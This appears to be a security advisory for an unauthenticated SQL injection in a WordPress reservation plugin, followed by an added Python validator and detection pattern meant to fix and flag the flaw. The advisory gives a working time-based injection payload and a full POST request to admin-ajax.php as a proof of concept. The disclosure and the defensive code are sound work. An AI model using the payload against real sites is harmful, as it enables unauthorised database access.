The plugin does not validate and escape some reservation parameters before using them in SQL statements, which could allow unauthenticated attackers to perform SQL Injection attacks.

As unauthenticated, fill the reservation form (it is on a page where the [reservation_form] shortcode is embedded), intercept the request and change the data parameter to something like:

["5","11","11:11","13:11:00","2022-08-07","Name","Mail","2","phone","confirmed' AND (SELECT 7872 FROM (SELECT(SLEEP(5)))dkvk) AND 'X'='X"]

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 305
Connection: close

action=kechup_rr_bookings_interact&validation_key=680bed9c59&operation=create&data=%5b%225%22%2c%2211%22%2c%2211%3a11%22%2c%2213%3a11%3a00%22%2c%222022-08-07%22%2c%22Name%22%2c%22Mail%22%2c%222%22%2c%22phone%22%2c%22confirmed'%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(0)))dkvk)%20AND%20'X'%3d'X%22%5d
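The root cause is that the positional values in the data array reach the SQL layer unvalidated. The following is an added example (not the plugin's code) of the server-side check a fix needs: it decodes the admin-ajax body above, enforces a strict shape per field and an allowlist for the status field, and flags SQL-keyword patterns for alerting. The field order, field names and allowed status values are assumptions inferred from the proof-of-concept array.

```python
import json
import re
from urllib.parse import parse_qs

# Constructed sample: the request body from the advisory (data is a URL-encoded
# JSON array whose last element carries the time-based payload).
SAMPLE_BODY = (
    "action=kechup_rr_bookings_interact&validation_key=680bed9c59&operation=create"
    "&data=%5b%225%22%2c%2211%22%2c%2211%3a11%22%2c%2213%3a11%3a00%22%2c%222022-08-07%22"
    "%2c%22Name%22%2c%22Mail%22%2c%222%22%2c%22phone%22%2c%22confirmed'%20AND%20(SELECT"
    "%207872%20FROM%20(SELECT(SLEEP(0)))dkvk)%20AND%20'X'%3d'X%22%5d"
)

# Assumed field order (names are hypothetical, inferred from the PoC array).
FIELD_RULES = {
    0: ("id_a", re.compile(r"\d{1,10}")),
    1: ("id_b", re.compile(r"\d{1,10}")),
    2: ("time_from", re.compile(r"([01]\d|2[0-3]):[0-5]\d")),
    3: ("time_to", re.compile(r"([01]\d|2[0-3]):[0-5]\d:[0-5]\d")),
    4: ("date", re.compile(r"\d{4}-(0[1-9]|1[0-2])-(0[1-9]|[12]\d|3[01])")),
    7: ("guests", re.compile(r"\d{1,3}")),
}
STATUS_ALLOWLIST = {"pending", "confirmed", "cancelled"}  # assumed values
SQLI_HINTS = re.compile(r"(?i)\b(sleep|benchmark|union|select)\s*\(|['\"]\s*(and|or)\s+")

def decode_data(body: str) -> list:
    """Parse the admin-ajax POST body and return the JSON array from `data`."""
    params = parse_qs(body, keep_blank_values=True)  # percent-decodes for us
    fields = json.loads(params.get("data", [""])[0])
    if not isinstance(fields, list) or len(fields) != 10:
        raise ValueError("data must be a JSON array of exactly 10 strings")
    return [str(f) for f in fields]

def validate_booking(fields: list) -> list:
    """Return a list of problems; an empty list means every value may be bound."""
    problems = []
    for idx, (name, rule) in FIELD_RULES.items():
        if not rule.fullmatch(fields[idx]):
            problems.append(f"{name}: malformed value {fields[idx]!r}")
    if fields[9] not in STATUS_ALLOWLIST:
        problems.append(f"status: {fields[9]!r} not in allowlist")
    for idx in (5, 6, 8):  # free text: bound as parameters, so only cap length
        if len(fields[idx]) > 100:
            problems.append(f"field {idx}: too long")
    for idx, value in enumerate(fields):  # detection signal for logging/alerting
        if SQLI_HINTS.search(value):
            problems.append(f"field {idx}: SQL keyword pattern (alert)")
    return problems
```

Run against SAMPLE_BODY the status allowlist rejects the record and the hint check raises an alert, while a well-formed array passes with no problems; the values that pass must still be bound with $wpdb->prepare() rather than concatenated.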
Bastijn Ouwendijk
Yes
2022-09-06 (about 8 months ago)